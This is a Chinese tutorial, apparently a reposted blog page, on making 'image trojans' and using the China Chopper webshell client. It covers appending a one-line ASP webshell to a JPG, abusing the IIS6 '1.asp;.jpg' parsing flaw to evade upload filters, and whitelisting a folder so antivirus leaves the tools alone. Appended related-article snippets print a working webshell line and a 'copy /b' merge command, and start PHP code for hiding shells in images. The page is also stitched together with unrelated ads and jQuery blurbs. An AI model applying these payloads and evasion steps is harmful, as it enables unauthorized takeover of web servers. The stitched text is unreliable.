图片马的制作以及菜刀的使用

有些网站我们在拿shell的时候,会要用到上传文件,但是有的时候都会有过滤,如果只是上传.asp .php结尾的文件的话系统是不会给你上传的,那么这个时候我们通常会利用一些其他的思路,比如说iis6中的解析漏洞,把一句话放到图片里面,写成1.asp;.jpg 1.asp;.jpg的格式上传上去,这样上传的时候文件会被检测为是图片,上传成功之后会将这个文件当asp来解析

图片马是WEB渗透测试时的必备,今天就教大家怎么做图片马。非常简单

图片马指的是代码写入后不破坏图片为前提,图片仍可正常打开。

先准备好图片和asp文件。

将图片以文本方式打开,如图

不管里面的内容有多少,只保留前面三行(因为jpg,png的头保存在前三行,若删除则无法被识别成图片文件)

,其他内容删掉。直接将一句话木马附上去,如图。因为如果.jpg文件内容过长的话会影响到木马的内容。

然后保存,成功制作。

现在我们再来讲一下菜刀的使用

首先将一个很重要的问题,现在网上的菜刀本身是会报毒的,拿一个尽可能干净的菜刀,放入一个文件夹中,这个文件夹提前添加信任,防止误杀。另外自己制作的一句话木马有时候也会被自己的系统给杀掉,所以所有的操作全部放在信任文件夹下进行,正是应为这个问题才导致我们有很大一部分学生出现了,在菜刀使用过程中出现的一些报错。

打开菜刀,会有三条默认链接,可以直接删除

如何添加我们的一句话?

在菜刀界面空白处右键选择添加

在添加shell页面写入上传的一句话的地址、密码、配置信息、shell类别等,添加完之后就可以连接了

原文地址:https://www.cnblogs.com/WhiteHatKevil/p/10073983.html

时间: 2024-10-11 17:11:52

图片马的制作以及菜刀的使用的相关文章

一句话图片木马的制作与使用方法

之前也写了个一句话木马的使用方法在回帖中有人提出问题如何在图片中插入一句话木马于是为了方便各位在此开一帖一句话图片木马的使用方法 第一种方法:利用copy命令详细操作为1.随便找一张图片 名字改成1.jpg(名字改为1.jpg只是为了方便记忆和输入 文件的后缀随意 只要是图片的格式就可以了)2.<%eval request("keio")%>           存为1.asp(就是一句话木马)3.copy 1.jpg /b + 1.asp /a 2.jpg      存为

突破php 的imagecopyresampled 和imagecopyresized 实现图片马 JPG

之前有人发布了 利用PNG 图片上述压缩函数的方法 原理利用 PNG的结构IDAT chunks填充一句话webshell,并进行一套取模运算  详见: https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/ 但是受限于  图像的尺寸 必须320×320 且必须是PNG格式 那JPG怎么办 神奇的老外 提出了列方法 <?php         /* The algorithm of inject

Adobe Fireworks CS6是一款集网页图片设计、制作与编辑为一体的专业软件

Adobe Fireworks CS6是一款集网页图片设计.制作与编辑为一体的专业软件,它不仅可以轻松制作出各种动感的Gif.动态按钮.动态翻转等网络图片,还可以轻松实现大图切割,让网页加载的图片显示速度变得更快,也可为用户在瞬间制作出精美的矢量和点阵图.模型.3D 图形和交互式内容提供平台,软件最大的好处在于无需编码,可直接应用于网页和移动应用程序.Fireworks CS6充分利用高效的jQuery,使其支持移动主题的制作,包括从设计组件中添加 CSS Sprite 图像的功能,内置适用于W

jquery图片放大镜效果制作变焦镜头图片放大查看

jquery图片放大镜效果制作变焦镜头图片放大查看 http://www.17sucai.com/pins/demoshow/8511

制作一句话图片马

原文地址:https://www.cnblogs.com/gdf456/p/9586059.html

图片动画精灵制作工具Texture Packer的使用

TexturePacker是一个图片纹理打包工具,可以将很多张图片,合并成一张.主要的应用场景就是css图片精灵,还有游戏中的动画精灵.对前端开发工程师和游戏工程师都是很不错的工具. TexturePacker的特点有: a.  制作css图片精灵的时候自动生成css,制作游戏动画精灵的时候可以根据不同的游戏引擎,生成相应的描述文件,如json,可以用于游戏开发中. b. 自动放置精灵图片,使用起来非常方便. c. 减少网络请求,节约用户内存.减少内存是因为手机中渲染是使用的openGL ES就

JS图片瀑布流制作

这里为大家带来了两种通过js制作图片瀑布流的方法. 一.绝对定位法 计算每个元素的绝对位置进行设置. <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0">

朋友发来的图片,要制作成身份证复印件,怎么办?

前期调查: A4纸尺寸 210mm×297mm 第二代居民身份证为多层聚酯材料复合而成的单页卡式证件,长度85.6mm,宽度54mm,厚度0.9mm. 大概步骤: 新建A4纸尺寸 210mm×297mm的画布 ctrl + r 调出标尺,用U 选框工具,画出身份证的尺寸,栅格化.完成身份证模板制作. 接下来,放入你朋友发你的照片,CTRAL + T 尺寸调整好后.先点击模板,按W 魔棒操作,选中调整好的区域.然后在原来图层上面 新建图层.得到想要的图层后把原来图层删除掉,得到一个想要的图像. 后

图片展示的制作

在这里,我实现了在页面内进行图片展示,当鼠标移动到相应的图片上后,图片下方的文字介绍会上移,并完整显示,半透明的文字介绍会覆盖掉图片,当鼠标移开之后,文字又会回到原来的位置. 要实现这样的图片展示,我主要是通过改变文字介绍的top值来实现的. 在编码的过程中,我犯了一个错误,就是将js代码写在head标签内的时候并没有使用window.onload事件,导致页面功能受到影响.这样的情况,是因为没有保证页面加载完成.如果把这段js代码放在body结束标签前,就不会出错. <!DOCTYPE htm